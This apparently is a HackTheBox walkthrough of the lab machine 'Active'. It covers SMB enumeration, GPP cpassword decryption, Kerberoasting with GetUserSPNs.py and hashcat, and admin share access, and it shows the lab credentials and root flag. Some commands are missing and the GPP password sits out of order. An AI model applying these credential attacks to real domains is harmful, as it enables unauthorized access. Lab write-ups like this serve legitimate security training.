Active is an easy-rated Windows machine from HackTheBox, created by eks and mrb3n. In the current post, my IP is 10.10.14.210, and the target IP is 10.129.38.41
Recon
The first steps are about getting basic information about the target, by using nmap and searching information from the website.
Local Terminal
ping -c 1 10.129.38.41
PING 10.129.38.41 (10.129.38.41) 56(84) bytes of data.
64 bytes from 10.129.38.41: icmp_seq=1 ttl=63 time=202 ms
--- 10.129.38.41 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 202.335/202.335/202.335/0.000 ms
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 126
88/tcp open kerberos-sec syn-ack ttl 126
135/tcp open msrpc syn-ack ttl 126
139/tcp open netbios-ssn syn-ack ttl 126
389/tcp open ldap syn-ack ttl 126
445/tcp open microsoft-ds syn-ack ttl 126
464/tcp open kpasswd5 syn-ack ttl 126
593/tcp open http-rpc-epmap syn-ack ttl 126
636/tcp open ldapssl syn-ack ttl 126
3268/tcp open globalcatLDAP syn-ack ttl 126
3269/tcp open globalcatLDAPssl syn-ack ttl 126
5722/tcp open msdfsr syn-ack ttl 126
9389/tcp open adws syn-ack ttl 126
47001/tcp open winrm syn-ack ttl 126
49153/tcp open unknown syn-ack ttl 126
49154/tcp open unknown syn-ack ttl 126
49155/tcp open unknown syn-ack ttl 126
49157/tcp open unknown syn-ack ttl 126
49158/tcp open unknown syn-ack ttl 126
49162/tcp open unknown syn-ack ttl 126
49166/tcp open unknown syn-ack ttl 126
49168/tcp open unknown syn-ack ttl 126
And then we try to get the version and run basic scripts with Nmap in each port.
Nmap scan report for 10.129.38.41
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-26 21:17:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-08-26T21:18:39
|_ start_date: 2024-08-26T18:53:23
Quite a few open ports! Normal in Windows... now, we are interested in the port that manages the SMB environment; these are ports 139 and 445. Therefore, we will use basic tools for their exploration.
SMB Enumeration
Local Terminal
enum4linux -a 10.129.38.41
=================================( Share Enumeration on 10.129.38.41 )================
do_connect: Connection to 10.129.38.41 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.129.38.41
//10.129.38.41/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/C$ Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/IPC$ Mapping: OK Listing: DENIED Writing: N/A
//10.129.38.41/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/Replication Mapping: OK Listing: OK Writing: N/A
//10.129.38.41/SYSVOL Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/Users Mapping: DENIED Listing: N/A Writing: N/A
The only relevant information comes from "Share Enumeration," where we list the shared resources and determine which ones are visible to the Anonymous user; in this case, it is "Replication." Now, we will review it using smbclient or smbmap.
Exploring Replication
With smbclient, you can explore manually, but with smbmap, you can recursively extract all the files that you have permission to read.
The Groups.xml file appears to be a log document created when a user is added with a group related to Group Policy Preferences (GPP). This is valuable information because, in this context, to use the active.htb user, we need to decrypt the password.
Password Decryption
Since it is a cpassword from GPP (Group Policy Preferences), we can use the following method to decrypt it:
[+] IP: 10.129.38.41:445 Name: 10.129.38.41 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
From this list, "Users" seems to be the most interesting... As usual, the flag is likely to be on the desktop. It is important to keep in mind that to log in, you need to use the group associated with the password. In this case, the group is "SVC_TGS."
Within the Impacket suite, there's a script called GetUserSPNs.py that is very useful for finding users vulnerable to Kerberoasting. This attack targets Service Principal Names (SPNs) associated with user accounts in Active Directory that are used for Kerberos authentication. {password: GPPstillStandingStrong2k18}
Now we just need to decrypt the hash. The good news is that the script outputs the data in a format compatible with Hashcat, making it easier to crack the hash.
Local Terminal
$ hashcat -m 13100 -a 0 GetUserSPNs.out /shared/payload/rockyou.txt --force
$ hashcat -m 13100 -a 0 GetUserSPNs.out /shared/payload/rockyou.txt --force --show
Great! With the password "Ticketmaster1968," we can now check what the admin account has access to—potentially everything. The next step is to access the SMB share and extract the flag.
[+] IP: 10.129.38.41:445Name: 10.129.38.41 Status: ADMIN!!!
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ, WRITE Logon server share
Replication READ ONLY
SYSVOL READ, WRITE Logon server share
Users READ ONLY
With admin status confirmed, you have elevated privileges. When exploring the SMB shares, the $C share represents the root of the C: drive, which is indeed the most important and often contains critical files, including potential flags or sensitive information.
$ cd \users\administrator\desktop\
$ get root.txt
$ exit
Local Terminal
cat root.txt
ce53b45c12214816f72f7f69ae9ecce4
Alternativa
With the credentials confirmed as valid, you can use them to gain shell access on the target system. Given the password "Ticketmaster1968," you can attempt to connect via different methods like SMB or WinRM to obtain a shell.